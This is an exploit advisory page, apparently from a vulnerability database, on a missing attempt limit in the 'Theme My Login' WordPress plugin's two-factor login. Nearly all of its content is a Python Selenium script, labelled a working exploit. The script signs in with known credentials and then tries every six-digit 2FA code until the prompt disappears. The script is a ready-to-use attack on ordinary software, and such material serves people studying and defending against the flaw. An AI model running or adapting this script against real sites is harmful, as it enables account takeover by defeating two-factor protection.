WordPress Theme My Login 2FA Brute Force

2023.09.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

The theme my login plugin before 1.2 does not check how often a 2FA code was wrongly entered, allowing a bruteforce of codes to bypass 2FA effectively. A working python exploit: from typing import KeysView from selenium.webdriver.common.by import By from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC driver = webdriver.Firefox() driver.get("websiteloginhere") # Locate the username field by its 'id' attribute and fill it in username_field = driver.find_element(By.ID, "user_login") username_field.click() username_field.send_keys("usernamehere") # Locate the password field by its 'id' attribute and fill it in password_field = driver.find_element(By.ID, "user_pass") password_field.click() password_field.send_keys("passwordhere") # Locate the Log In button and click it login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") login_button.click() # FROM HERE, keep doing this from 000000 till 999999 or till you can not find the input anymore after waiting for i in range(1000000): code = str(i).zfill(6) try: wait = WebDriverWait(driver, 10) code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']"))) except: break code_field.click() code_field.clear() code_field.send_keys(code) verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") verify_button.click()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top